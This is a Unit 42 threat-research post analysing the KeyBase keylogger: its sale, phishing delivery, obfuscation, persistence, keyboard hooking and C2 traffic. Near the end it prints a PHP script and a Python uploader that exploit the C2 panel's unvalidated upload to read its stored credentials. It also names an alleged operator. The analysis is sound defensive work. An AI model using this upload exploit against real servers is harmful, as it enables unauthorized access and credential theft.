[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)  
  English
* [English](https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/)
* [Japanese](https://unit42.paloaltonetworks.com/ja/keybase-keylogger-malware-family-exposed/)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/ "Threat Research")
* [Malware](https://unit42.paloaltonetworks.com/category/malware/ "Malware")  
  [Malware](https://unit42.paloaltonetworks.com/category/malware/)

# KeyBase Keylogger Malware Family Exposed

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 9 min read  
Related Products  
[![Advanced WildFire icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced WildFire](https://unit42.paloaltonetworks.com/product-category/advanced-wildfire/ "Advanced WildFire")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Unit 42](https://unit42.paloaltonetworks.com/author/unit42/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:June 4, 2015

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [Malware](https://unit42.paloaltonetworks.com/category/malware/)
  * [Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [419 Evolution](https://unit42.paloaltonetworks.com/tag/419-evolution/)
  * [Hackforums.net](https://unit42.paloaltonetworks.com/tag/hackforums-net/)
  * [KeyBase](https://unit42.paloaltonetworks.com/tag/keybase/)
  * [KeyHook](https://unit42.paloaltonetworks.com/tag/keyhook/)
  * [Keylogger](https://unit42.paloaltonetworks.com/tag/keylogger/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/?pdf=download&lg=en&_wpnonce=8eff5d0d06 "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/keybase-keylogger-malware-family-exposed/?pdf=print&lg=en&_wpnonce=8eff5d0d06 "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](mailto:?subject=KeyBase%20Keylogger%20Malware%20Family%20Exposed&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fkeybase-keylogger-malware-family-exposed%2F "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fkeybase-keylogger-malware-family-exposed%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fkeybase-keylogger-malware-family-exposed%2F&title=KeyBase%20Keylogger%20Malware%20Family%20Exposed "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fkeybase-keylogger-malware-family-exposed%2F&text=KeyBase%20Keylogger%20Malware%20Family%20Exposed "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fkeybase-keylogger-malware-family-exposed%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](https://mastodon.social/share?text=KeyBase%20Keylogger%20Malware%20Family%20Exposed%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fkeybase-keylogger-malware-family-exposed%2F "Share in Mastodon")
  In recent months, our team has been tracking a keylogger malware family named KeyBase that has been in the wild since February 2015. The malware comes equipped with a variety of features and can be purchased for $50 directly from the author. It has been deployed in attacks against organizations across many industries and is predominantly delivered via phishing emails.

In total, Palo Alto Networks [AutoFocus](https://media.paloaltonetworks.com/lp/autofocus/) threat intelligence service identified 295 unique samples over roughly 1,500 unique sessions in the past four months. Attacks have primarily targeted the high tech, higher education, and retail industries.

### Malware Distribution and Targets

KeyBase was first observed in mid-February of 2015. Shortly before then, the domain 'keybase\[.\]in', was registered as a homepage and online store for the KeyBase keylogger.

Domain Name:KEYBASE.IN  
Created On:04-Feb-2015 08:27:44 UTC  
Last Updated On:05-Apr-2015 19:20:38 UTC  
Expiration Date:04-Feb-2016 08:27:44 UTC

This activity is in-line with an initial posting made by a user with the handle 'Support™' announcing KeyBase on the [hackforums.net forum](https://www.hackforums.net/member.php?action=profile&uid=218524) on February 7, 2015. In the forum post, the malware touts the following features:

* Advanced Keylogger
* Fully undetected scan-time and run-time (Later removed)
* User-friendly web-panel
* Unicode support
* Password recovery

[![hack forums](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-forums-500x174.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-forums.png)

Figure 1. KeyBase posting on hackforums.net

Since February 2015, approximately 1,500 sessions carrying [KeyBase](https://autofocus.paloaltonetworks.com/#/tag/Commodity.KeyBase) have been captured by WildFire, as we can see below:

[![hack figure 2](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-2-500x91.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-2.png)

Figure 2. KeyBase timeline in AutoFocus

We can also quickly determine targeted industries using AutoFocus:

[![hack figure 3](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-3-500x148.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-3.png)

Figure 3. Targeted industries in AutoFocus

The targeted companies span the globe and are located in many countries.

[![hack figure 4](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-4-500x245.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-4.png)

Figure 4. Targeted countries in AutoFocus

This malware is primarily delivered via phishing emails using common lures. Some examples of attachment filenames can be seen below:

* Purchase Order.exe
* New Order.exe
* Document 27895.scr
* Payment document.exe
* PO #7478.exe
* Overdue Invoices.exe

One such example of an email delivering KeyBase can be seen below.

[![hack figure 5](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-5-500x328.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-5.png)

Figure 5. KeyBase phishing email

Overall, Unit 42 has seen a large number of separate campaigns using KeyBase. As the software can be easily purchased by anyone, this comes as no surprise. As we can see in the following diagram, around 50 different command and control (C2) servers have been identified with up to as many as 50 unique samples connecting to a single C2.

[![hack figure 6](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-6-500x448.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-6.png)

Figure 6. KeyBase campaign diagram

### Malware Overview

KeyBase itself is written in C# using the .NET Framework. These facts allowed us to decompile the underlying code and identify key functionality and characteristics of the keylogger.

[![hack figure 7](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-7-500x251.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-7.png)

Figure 7. KeyBase logo

Functionality in KeyBase includes the following:

* Display a website on startup
* Screenshots
* Download/Execute
* Persistence
* Kill Timer

When the malware is initially executed, a series of threads are spawned.

[![hack figure 8](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-8-500x542.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-8.png)

Figure 8. KeyBase main function

The various functions spawned in new threads may be inert based on options specified by the attacker during the build. Should a feature not be enabled, a function looks similar to the following:

[![hack figure 9](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-9-500x97.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-9.png)

Figure 9. Inert functions in KeyBase

[![hack figure 10](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-10.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-10.png)

Figure 10. KeyBase builder

The author makes use of a number of simple obfuscation techniques on various strings used within the code. Examples of this include replacing single characters that have been added to strings, as well as performing reverse operations on strings.

[![hack figure 11](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-11-500x62.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-11.png)

Figure 11. String obfuscation using replace

[![hack figure 12](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-12-500x64.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-12.png)

Figure 12. String obfuscation using reverse

Additionally, the author makes use of an 'Encryption' class. This class is used to decrypt a number of strings found within the code.

[![hack figure 13](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-13-500x735.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-13.png)

Figure 13. KeyBase Encryption class

References to this decompiled code were discovered in an old posting on hackforums.net, where the user 'Ethereal' provided sample code.

[![hack figure 14](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-14-500x274.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-14.png)

Figure 14. Encryption code posting on hackforums.net

We see the 'DecryptText' function used by the author when he/she dynamically loads a number of Microsoft Windows APIs.

[![hack figure 15](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-15-500x77.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-15.png)

Figure 15. Obfuscated API functions in KeyBase

The following Python code can be used to decrypt these strings.  
\#!/usr/bin/python # -\*- coding: utf-8 -\*- strings = \[ u"ĈőŘĝŏŒįķŎŖġŎŠĠz", \\ u"ŝƕƸšƔưƕŷƔƇżƚƲƕƎƤË", \\ u"ķůƒĻŮƊůőŮšŖŴƌůŨž¥", \\ u"ńŰƓļůƋŰŒůŢŗŵƍŰũſ¦", \\ u"ŨƚƶľśƌƐƅſƧźƌƚƏŔƚƭżƌƱƟÆ", \\ u"ĴšűĽňżūŅšƃŌŅůũőŮƉ\\u0097", \\ u"ŇżƇśūŨżşŭƃŚŹťůŝŹƐŠ¥", \\ u"ıűŦňŦŬŭĹŦŶőňűŐňŠƅŃŨŹ\\u0098", \\ u"ńűƎřŹŷŴįŴƈŔŧśƀ£", \\ u"ŵƢǄƏƦưƑƋƯƶŻƝØ" \] key = 'KeyBase' def dec(str, key): key\_len = len(key) out = "" for c, s in enumerate(str\[:-1\]): out += chr(ord(s) - ord(key\[c%key\_len\]) - ord(str\[-1\])) return out for s in strings: print "Decoded: %25s | Encoded: %s" % (dec(s, key), repr(s))

|-------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | #!/usr/bin/python # -\*- coding: utf-8 -\*- strings = \[ u"ĈőŘĝŏŒįķŎŖġŎŠĠz", \\ u"ŝƕƸšƔưƕŷƔƇżƚƲƕƎƤË", \\ u"ķůƒĻŮƊůőŮšŖŴƌůŨž¥", \\ u"ńŰƓļůƋŰŒůŢŗŵƍŰũſ¦", \\ u"ŨƚƶľśƌƐƅſƧźƌƚƏŔƚƭżƌƱƟÆ", \\ u"ĴšűĽňżūŅšƃŌŅůũőŮƉ\\u0097", \\ u"ŇżƇśūŨżşŭƃŚŹťůŝŹƐŠ¥", \\ u"ıűŦňŦŬŭĹŦŶőňűŐňŠƅŃŨŹ\\u0098", \\ u"ńűƎřŹŷŴįŴƈŔŧśƀ£", \\ u"ŵƢǄƏƦưƑƋƯƶŻƝØ" \] key = 'KeyBase' def dec(str, key): key\_len = len(key) out = "" for c, s in enumerate(str\[:-1\]): out += chr(ord(s) - ord(key\[c%key\_len\]) - ord(str\[-1\])) return out for s in strings: print "Decoded: %25s | Encoded: %s" % (dec(s, key), repr(s)) |

### Persistence

Persistence in KeyBase, should it be enabled, is achieved using two techniques---copying the malware to the startup folder or setting the Run registry key to autorun on startup. When KeyBase copies itself to the startup folder, it names itself 'Important.exe.' This is statically set by the author and cannot be changed by the user in the current version. The key used in the following Run registry key is set by the user, and is always a 32 byte hexadecimal value.

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \[32 byte key\] : \[Path to Executable\]

### Keylogging

Keylogging in KeyBase is primarily accomplished in a separate class appropriately named 'KeyHook.' While the class shares a name with a [publicly available repository on github](https://github.com/Aristocat/KeyHook), the class appears to be custom written. While custom, the class itself uses a very common technique of using the Microsoft Windows [SetWindowsHookExA](https://msdn.microsoft.com/en-us/library/windows/desktop/ms644990%28v=vs.85%29.aspx) in order to hook the victim's keyboard.

[![hack figure 16](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-16-500x93.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-16.png)

Figure 16. Hooking keyboard via SetWindowsHookExA

The author proceeds to handle appropriate keyboard events as expected.

[![hack figure 17](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-17-500x447.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-17.png)

Figure 17. Handling keyboard events

The class also has the ability to handle Unicode characters, as well as get the name of the foreground window. This allows the malware to not only identify what keys are being pressed, but what application said key presses are being sent to.

### Command and Control (C2)

All communication with a remote server takes place via HTTP. Data is not encrypted or obfuscated in any way. Upon initial execution, KeyBase will perform an initial check-in to the remote server, as we can see below.

[![hack figure 18](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-18-500x27.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-18.png)Figure 18. Initial KeyBase notification HTTP GET request

A number of HTTP headers are not included with the request. This provides a simple technique for flagging the activity as malicious. It is also important to note that it is fairly elementary to detect the activity using the hardcoded GET variables included in the request. While the victim machine name and the current time will vary, the remainder of the request will remain static.

KeyBase may also send the following data back to its C2 server:

* Keystrokes
* Clipboard
* Screenshots

Examples of this data can be seen below.

[![hack figure 19](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-19-500x46.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-19.png)

Figure 19. KeyBase uploading clipboard data

[![hack figure 20](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-20-500x41.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-20.png)

Figure 20. KeyBase uploading keystroke data

During this communication with its C2 server, KeyBase will include the raw clipboard and keystroke log data using various GET parameters. This data is URI-encoded, but otherwise sent in the clear.

Finally, Keybase will also use a specific URI to upload screenshots. The path '/image/upload.php' is hardcoded within the malware. All images sent back to its C2 server will be placed within the '/image/Images/' path. Uploaded data is once again sent unencrypted, as we can see below.

[![hack figure 21](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-21-500x142.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-21.png)

Figure 21. KeyBase uploading screenshot image

### Web Panel

The web panel itself does not provide any innovative characteristics. It uses a simple red/grey color scheme as seen below.

[![hack figure 22](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-22-500x251.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-22.png)

Figure 22. KeyBase web panel

The panel does allow the attacker to quickly view infected machines, keystrokes, screenshots, clipboard data, and password data. Unfortunately, the author of KeyBase does not make use of pagination, which results in poor performance in the event a large amount of data is being displayed to the attacker.

### Interesting Discoveries

During the course of our research, Unit 42 discovered that no authentication was required when viewing the '/image/Images/' path. One C2 server in particular stood out because it appeared the operator was testing KeyBase on his/her local machine. As such, screenshots of his machine were uploaded to his server and could be viewed by the general public. In the screenshot below, we can clearly see the 'KeyBase v1.0' folder. This folder almost certainly contains the KeyBase installation. While viewing the operator's desktop, we can also see a number of other keyloggers, such as 'HawkEye Keylogger' and 'Knight Logger'. Also of note is a popular crypter named 'AegisCrypter'. Finally, we can also see that the user engages in piracy, as copies of both 'The Hobbit' and 'Fury' appear on the desktop as well.

[![hack figure 23](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-23-500x281.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-23.png)

Figure 23. KeyBase operator desktop screenshot

While continuing to examine the uploaded images, we also identify the user logging into a Windows Web Server 2008 R2 instance via remote desktop. This appears to be where the attacker is launching their spam campaigns using an instance of 'Turbo-Mailer 2.7.10'. Unfortunately, it appears the operator had forgotten his/her username/password at this particular moment.

[![hack figure 24](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-24-500x281.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-24.png)

Figure 24. KeyBase operator sending phishing emails

Further examination of the uploaded screenshots shows activity of the user logging into his/her Facebook account. The user looks to be named 'China Onyeali' and is observed discussing some of his/her latest endeavors. Specifically, we see a link to a .rar file hosted on rghost\[.\]net containing the [following file](https://www.virustotal.com/en/file/1d8173c15551c1adffe0613dd420228ba46e0a792c520230df4152c0c9bc6199/analysis/). We also see the operator discussing the HawkEye keylogger in another chat window. The operator's Facebook page claims that he/she lives in Mbieri, Nigeria. We previously reported on Nigerian actors using off-the-shelf tools to attack business in our [419 Evolution report last](https://paloaltonetworks.com/resources/research/419evolution.html) July. This user has been reported to the Facebook security team.

[![hack figure 25](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-25-500x281.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-25.png)

Figure 25. KeyBase operator logged into Facebook

### Further Interesting Discoveries

Other interesting discoveries were made while researching the backend C2 code. In particular, the upload.php file was examined and analyzed, as this file handles file uploads to the server. As we can see, there is no validation for the types of files uploaded to the remote server.

[![hack figure 26](http://blog.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-26-500x141.png)](https://unit42.paloaltonetworks.com/wp-content/uploads/2015/06/hack-figure-26.png)

Figure 26. KeyBase screenshot upload PHP script

This poses an issue from a security perspective, as a third party can simply upload a PHP script to the '/image/Images/' directory to gain unauthorized access. The following PHP code can be used to read the KeyBase 'config.php' script, which contains the username and password for the web panel.  
\<?php $file = '../../config.php'; echo "It works!"."\</br\>"; if (file\_exists($file)) { echo "Reading file"."\</br\>"; echo file\_get\_contents($file); } ?\>

|----------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 | \<?php $file = '../../config.php'; echo "It works!"."\</br\>"; if (file\_exists($file)) { echo "Reading file"."\</br\>"; echo file\_get\_contents($file); } ?\> |

Additionally, the following Python code can be used to upload this file and read the results.  
import requests import sys if len(sys.argv) != 2: print "Usage: %s \[php\_file\]" % **file** sys.exit(1) URL = "" print "Sending request..." multiple\_files = \[('file', ('WIN-JJFOIJGL\_6\_5\_14\_22\_2.php', open(sys.argv\[1\], 'rb')))\] r = requests.post(URL + "image/upload.php", files=multiple\_files) print "Results:" print r = requests.get(URL + "image/Images/WIN-JJFOIJGL\_6\_5\_14\_22\_2.php") print r.text

|----------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | import requests import sys if len(sys.argv) != 2: print "Usage: %s \[php\_file\]" % **file** sys.exit(1) URL = "" print "Sending request..." multiple\_files = \[('file', ('WIN-JJFOIJGL\_6\_5\_14\_22\_2.php', open(sys.argv\[1\], 'rb')))\] r = requests.post(URL + "image/upload.php", files=multiple\_files) print "Results:" print r = requests.get(URL + "image/Images/WIN-JJFOIJGL\_6\_5\_14\_22\_2.php") print r.text |

### Conclusion

Overall, this KeyBase malware is quite unsophisticated. It lacks a number of features available in some of the more popular malware families, and the C2 web panel contains security vulnerabilities that could allow a third party to gain unauthorized access. The builder for KeyBase provides an easy-to-use, user-friendly interface; however, a number of options are hardcoded into the malware itself. Some examples include the filename KeyBase uses when it is copied to maintain persistence, and various URI paths it uses during the command and control phase.

While this malware has some issues with sophistication, Unit 42 has observed a significant and continued rise in usage by attackers, generally targeting the high tech, higher education, and retail industries. Palo Alto Networks customers are protected via WildFire, which is able to detect KeyBase as malicious. Readers may also use the indicators provided to deploy protections.

For a list of sample hashes and their associated domains and IP addresses, please see the following [link](https://github.com/pan-unit42/iocs/blob/master/keybase/keybase_ioc.csv).
Back to top

### Tags

* [419 Evolution](https://unit42.paloaltonetworks.com/tag/419-evolution/ "419 Evolution")
* [Hackforums.net](https://unit42.paloaltonetworks.com/tag/hackforums-net/ "hackforums.net")
* [KeyBase](https://unit42.paloaltonetworks.com/tag/keybase/ "KeyBase")
* [KeyHook](https://unit42.paloaltonetworks.com/tag/keyhook/ "KeyHook")
* [Keylogger](https://unit42.paloaltonetworks.com/tag/keylogger/ "Keylogger")  
  [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research") [Next: Understanding Flash Exploitation and the Alleged CVE-2015-0359 Exploit](https://unit42.paloaltonetworks.com/understanding-flash-exploitation-and-the-alleged-cve-2015-0359-exploit/ "Understanding Flash Exploitation and the Alleged CVE-2015-0359 Exploit")

### Related Articles

* [Recent Jailbreaks Demonstrate Emerging Threat to DeepSeek](https://unit42.paloaltonetworks.com/jailbreaking-deepseek-three-techniques/ "article - table of contents")
* [Unraveling Sparkling Pisces's Tool Set: KLogEXE and FPSpy](https://unit42.paloaltonetworks.com/kimsuky-new-keylogger-backdoor-variant/ "article - table of contents")
* [OriginLogger: A Look at Agent Tesla's Successor](https://unit42.paloaltonetworks.com/originlogger/ "article - table of contents")

## Related Malware Resources

![Pictorial representation of post-exploitation identity misuse in SPIFFE/SPIRE. Close-up of a person wearing glasses, with computer code reflected in the lenses.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/12_Security-Technology_Category_1920x900-786x368.jpg)  
[![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 10, 2026 [#### The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/)

* [API](https://unit42.paloaltonetworks.com/tag/api/ "API")

* [Cryptographic](https://unit42.paloaltonetworks.com/tag/cryptographic/ "cryptographic")

* [JSON](https://unit42.paloaltonetworks.com/tag/json/ "JSON")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/kubernetes-spiffe-spire-identity-spoofing/ "The Machine With Many Faces: Post-Exploitation Identity Misuse in SPIFFE/SPIRE")  
  ![Pictorial representation of a pay-per-install threat group campaign prodiving infection service for spreading malware. A close-up of a computer circuit board with a central microchip is depicted. Red digital data streams in the form of glowing binary numbers and arrows appear to flow in and out of the chip, symbolizing data processing and transfer. The scene is illuminated with a futuristic blue and red glow.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/04_Malware_Category_1920x900-6-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 9, 2026 [#### Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/)

* [ARKTunnel](https://unit42.paloaltonetworks.com/tag/arktunnel/ "ARKTunnel")

* [C2](https://unit42.paloaltonetworks.com/tag/c2/ "C2")

* [CL-CRI-1171](https://unit42.paloaltonetworks.com/tag/cl-cri-1171/ "CL-CRI-1171")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ppi-network-malware-campaign-analysis/ "Untracked Nightmares: The Threats Hiding Behind Commodity Infrastructure")  
  ![Pictorial representation of attackers using AI tools to target Latin American organizations. A vibrant cityscape with silhouettes of numerous people walking along a bustling street. The scene is illuminated by bright urban lights and digital-like particles, creating a dynamic and futuristic atmosphere.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/09/AdobeStock_768915868-2-1-786x373.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) September 3, 2026 [#### Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/)

* [Agentic AI](https://unit42.paloaltonetworks.com/tag/agentic-ai/ "Agentic AI")

* [ChatGPT](https://unit42.paloaltonetworks.com/tag/chatgpt/ "ChatGPT")

* [CL-CRI-1131](https://unit42.paloaltonetworks.com/tag/cl-cri-1131/ "CL-CRI-1131")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-tool-use-targeting-latam-orgs/ "Attackers Expose Ongoing AI Tool Use Targeting Organizations in Latin America")  
  ![Pictorial representation of vishing campaigns in Microsoft Teams. A digital image of a skull formed by blue binary code on a black background, with scattered ones and zeros and digital noise, symbolizes how stealthy prompt injection attacks can exploit AI logic to bypass security controls.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/01_Malware_Category_1920x900-5-786x368.jpg)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 31, 2026 [#### Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/)

* [Cloaked Ursa](https://unit42.paloaltonetworks.com/tag/cloaked-ursa/ "Cloaked Ursa")

* [Entra ID](https://unit42.paloaltonetworks.com/tag/entra-id/ "Entra ID")

* [Microsoft Teams](https://unit42.paloaltonetworks.com/tag/microsoft-teams/ "Microsoft Teams")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/spring-ring-voice-phishing-campaigns/ "Spring Ring: An Inside Look at Voice Phishing Campaigns in Microsoft Teams")  
  ![Pictorial representation of AI-enabled malware. A vibrant digital interface displaying various icons and graphs, resembling a futuristic network or data analysis dashboard. The scene is illuminated with glowing lights and patterns.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/AdobeStock_1270203474-2-1-786x368.png)  
  [![category icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/icon-threat-research.svg)Threat Research](https://unit42.paloaltonetworks.com/category/threat-research/) August 25, 2026 [#### The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/)

* [Backdoor](https://unit42.paloaltonetworks.com/tag/backdoor/ "backdoor")

* [Bitcoin](https://unit42.paloaltonetworks.com/tag/bitcoin/ "Bitcoin")

* [DLL hijacking](https://unit42.paloaltonetworks.com/tag/dll-hijacking/ "DLL hijacking")  
  [Read now ![Right arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-right-arrow-withtail.svg)](https://unit42.paloaltonetworks.com/ai-enabled-malware-analysis/ "The State of AI-Enabled Malware August 2026: From Brand Abuse to Agentic Execution")  
  ![Pictorial representation of identity abuse through trusted communication channels. Close-up view of a digital screen displaying a glitched and pixelated image of a skull-like shape.](https://unit42.paloaltonetworks.com/wp-content/uploads/2026/08/02_Malware_Category_1920x900-2-786x368.jpg)  
